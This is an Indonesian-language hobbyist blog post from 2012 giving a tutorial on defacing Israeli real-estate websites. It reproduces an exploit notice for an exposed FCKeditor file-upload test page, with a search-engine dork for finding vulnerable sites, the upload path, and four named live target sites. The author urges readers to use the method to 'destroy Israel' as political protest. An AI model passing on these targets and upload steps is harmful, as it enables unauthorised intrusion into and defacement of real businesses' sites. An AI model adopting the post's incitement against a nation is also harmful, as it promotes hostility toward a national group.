Total Tayangan Laman

Selasa, 20 November 2012

Deface Situs Israel: Powered by Real Estate


Assalamualaikum saudara saudara muslim sebangsa dan setanah air :)  kembali bertemu dengan aku uwan terserah deh kalian mau panggil aku apa? Haha. ini sebagai post terakhir hari ini
Baiklah saya akan share tutorial deface khusus situs ISRAEL, karena saya baru nemuin nya, semalem lah tgl 8 agustus, sekarang kan tgl 9 hehe, ok ni simak aja.
Defaced By Indonesia
#####################################################
Exploit Title: Powered by Real Estate in Israel File Upload Vulnerability
Dork: intext:Powered by Real Estate in Israel
Author: BadBoy
Category: Remote, Webapps
Tested on: Windows Xp SP3
#####################################################
Poc/Exploit:
http://[localhost]/PATCH//FCKeditor/editor/filemanager/connectors/uploadtest.html
Allowed File:
You can upload pdf ,ppt ,txt ,doc ,rtf ,xml ,xsl ,dtd ,zip ,rar ,jpg ,png files
Preview:
- You can see if you success upload file.
Live Target:

- http://www.firstimmo1.com/FCKeditor/editor/filemanager/connectors/uploadtest.html
- http://www.tekoa-realty.com/FCKeditor/editor/filemanager/connectors/uploadtest.html
- http://www.ozma-nechasim.co.il/FCKeditor/editor/filemanager/connectors/uploadtest.html
- http://www.ruben1.com/FCKeditor/editor/filemanager/connectors/uploadtest.html
######################################################
-=[Thanks To: JAKTIM Hacker Link | DZAKWAN Hacker | And All Hacker Muslim :D ]=-
Apa pendapat kalian? Pasti mudahkan, karena saya tidak ingin memberikan materi SQL, saya rasa anak kecil pun bisa SQL hehe, sekarang bagaimana kita bermain exploit dengan menyerang URL :)
Ok semoga berguna ya, semangat hancurkan ISRAEL, sumpah dari umur saya 11 thn dan sekarang 16 thn, saya sudah mendukung gerakan Freedom Palestina !! Support dan bantu Palestina saudara :D

Tidak ada komentar:

Poskan Komentar